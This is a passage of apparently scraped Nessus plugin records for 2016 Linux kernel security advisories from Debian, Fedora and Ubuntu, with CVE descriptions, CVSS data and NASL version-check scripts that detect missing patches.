unclear, but might include denial of service or privilege\nescalation.\n\nCVE-2016-7118\n\nMarcin Szewczyk reported that calling fcntl() on a file descriptor for\na directory on an aufs filesystem would result in am 'oops'. This\nallows local users to cause a denial of service. This is a\nDebian-specific regression introduced in version 3.2.81-1.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.81-2. This version also fixes a build failure (bug #827561) for\ncustom kernels with CONFIG_MODULES disabled, a regression in version\n3.2.81-1. 
It also updates the PREEMPT_RT featureset to version\n3.2.81-rt117.\n\nFor Debian 8 'Jessie', CVE-2016-3857 has no impact; CVE-2016-4470 and\nCVE-2016-5829 were fixed in linux version 3.16.7-ckt25-2+deb8u3 or\nearlier; and the remaining issues are fixed in version\n3.16.36-1+deb8u1.\n\nWe recommend that you upgrade your linux packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-06T00:00:00", "title": "Debian DLA-609-1 : linux security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-7118", "CVE-2016-5696", "CVE-2016-3857", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-5829", "CVE-2016-4470"], "modified": "2016-09-06T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:linux"], "id": "DEBIAN_DLA-609.NASL", "href": "https://www.tenable.com/plugins/nessus/93321", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-609-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93321);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3857\", \"CVE-2016-4470\", \"CVE-2016-5696\", \"CVE-2016-5829\", \"CVE-2016-6136\", \"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7118\");\n\n script_name(english:\"Debian DLA-609-1 : linux security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the CVEs described below.\n\nCVE-2016-3857\n\nChiachih Wu reported two bugs in the ARM OABI compatibility layer that\ncan be used by local users for privilege escalation. The OABI\ncompatibility layer is enabled in all kernel flavours for armel and\narmhf.\n\nCVE-2016-4470\n\nWade Mealing of the Red Hat Product Security Team reported that in\nsome error cases the KEYS subsystem will dereference an uninitialised\npointer. A local user can use the keyctl() system call for denial of\nservice (crash) or possibly for privilege escalation.\n\nCVE-2016-5696\n\nYue Cao, Zhiyun Qian, Zhongjie Wang, Tuan Dao, and Srikanth V.\nKrishnamurthy of the University of California, Riverside; and Lisa M.\nMarvel of the United States Army Research Laboratory discovered that\nLinux's implementation of the TCP Challenge ACK feature results in a\nside channel that can be used to find TCP connections between specific\nIP addresses, and to inject messages into those connections.\n\nWhere a service is made available through TCP, this may\nallow remote attackers to impersonate another connected user\nto the server or to impersonate the server to another\nconnected user. 
In case the service uses a protocol with\nmessage authentication (e.g. TLS or SSH), this vulnerability\nonly allows denial of service (connection failure). An\nattack takes tens of seconds, so short-lived TCP connections\nare also unlikely to be vulnerable.\n\nThis may be mitigated by increasing the rate limit for TCP\nChallenge ACKs so that it is never exceeded: sysctl\nnet.ipv4.tcp_challenge_ack_limit=1000000000\n\nCVE-2016-5829\n\nSeveral heap-based buffer overflow vulnerabilities were found in the\nhiddev driver, allowing a local user with access to a HID device to\ncause a denial of service or potentially escalate their privileges.\n\nCVE-2016-6136\n\nPengfei Wang discovered that the audit subsystem has a 'double-fetch'\nor 'TOCTTOU' bug in its handling of special characters in the name of\nan executable. Where audit logging of execve() is enabled, this allows\na local user to generate misleading log messages.\n\nCVE-2016-6480\n\nPengfei Wang discovered that the aacraid driver for Adaptec RAID\ncontrollers has a 'double-fetch' or 'TOCTTOU' bug in its validation of\n'FIB' messages passed through the ioctl() system call. This has no\npractical security impact in current Debian releases.\n\nCVE-2016-6828\n\nMarco Grassi reported a 'use-after-free' bug in the TCP\nimplementation, which can be triggered by local users. The security\nimpact is unclear, but might include denial of service or privilege\nescalation.\n\nCVE-2016-7118\n\nMarcin Szewczyk reported that calling fcntl() on a file descriptor for\na directory on an aufs filesystem would result in am 'oops'. This\nallows local users to cause a denial of service. This is a\nDebian-specific regression introduced in version 3.2.81-1.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.81-2. This version also fixes a build failure (bug #827561) for\ncustom kernels with CONFIG_MODULES disabled, a regression in version\n3.2.81-1. 
It also updates the PREEMPT_RT featureset to version\n3.2.81-rt117.\n\nFor Debian 8 'Jessie', CVE-2016-3857 has no impact; CVE-2016-4470 and\nCVE-2016-5829 were fixed in linux version 3.16.7-ckt25-2+deb8u3 or\nearlier; and the remaining issues are fixed in version\n3.16.36-1+deb8u1.\n\nWe recommend that you upgrade your linux packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected linux package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, 
Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"linux\", reference:\"3.2.81-2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:15:02", "description": "The -101 build is an incremental build. it contains several fixes for\nknown bugzillas and one fix for a known oom regression.\n\n----\n\nThis is a rebase to 4.7.2. 
The 4.7.2 contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-06T00:00:00", "title": "Fedora 23 : kernel (2016-f1adaaadc6)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "modified": "2016-09-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-F1ADAAADC6.NASL", "href": "https://www.tenable.com/plugins/nessus/93332", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-f1adaaadc6.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93332);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_xref(name:\"FEDORA\", value:\"2016-f1adaaadc6\");\n\n script_name(english:\"Fedora 23 : kernel (2016-f1adaaadc6)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The -101 build is an incremental build. it contains several fixes for\nknown bugzillas and one fix for a known oom regression.\n\n----\n\nThis is a rebase to 4.7.2. 
The 4.7.2 contains a number of important\nfixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-f1adaaadc6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-f1adaaadc6\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.7.2-101.fc23\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": 
"2021-01-12T10:14:04", "description": "The -201 build is an incremental build. it contains several fixes for\nknown bugzillas and one fix for a known oom regression.\n\n----\n\nThis is a rebase to the 4.7.2 kernel. The 4.7.2 update contains a\nnumber of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-06T00:00:00", "title": "Fedora 24 : kernel (2016-2e5ebfed6d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828"], "modified": "2016-09-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2016-2E5EBFED6D.NASL", "href": "https://www.tenable.com/plugins/nessus/93326", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-2e5ebfed6d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93326);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\");\n script_xref(name:\"FEDORA\", value:\"2016-2e5ebfed6d\");\n\n script_name(english:\"Fedora 24 : kernel (2016-2e5ebfed6d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The -201 build is an incremental build. 
it contains several fixes for\nknown bugzillas and one fix for a known oom regression.\n\n----\n\nThis is a rebase to the 4.7.2 kernel. The 4.7.2 update contains a\nnumber of important fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-2e5ebfed6d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2016-2e5ebfed6d\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"kernel-4.7.2-201.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": 
"2021-03-01T07:31:26", "description": "Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 16.04 LTS : linux-raspi2 vulnerabilities (USN-3099-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2"], "id": "UBUNTU_USN-3099-3.NASL", "href": "https://www.tenable.com/plugins/nessus/93958", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3099-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93958);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3099-3\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-raspi2 vulnerabilities (USN-3099-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3099-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.4-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3099-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1027-raspi2\", pkgver:\"4.4.0-1027.33\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-raspi2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:31:26", "description": "Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the\nTCP retransmit queue handling code in the Linux kernel. 
A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID\ncontroller driver in the Linux kernel when handling ioctl()s. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2016-6480).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-11T00:00:00", "title": "Ubuntu 16.04 LTS : linux-snapdragon vulnerabilities (USN-3099-4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6828", "CVE-2016-7039"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon"], "id": "UBUNTU_USN-3099-4.NASL", "href": "https://www.tenable.com/plugins/nessus/93959", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3099-4. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93959);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-6480\", \"CVE-2016-6828\", \"CVE-2016-7039\");\n script_xref(name:\"USN\", value:\"3099-4\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-snapdragon vulnerabilities (USN-3099-4)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vladimir Benes discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could 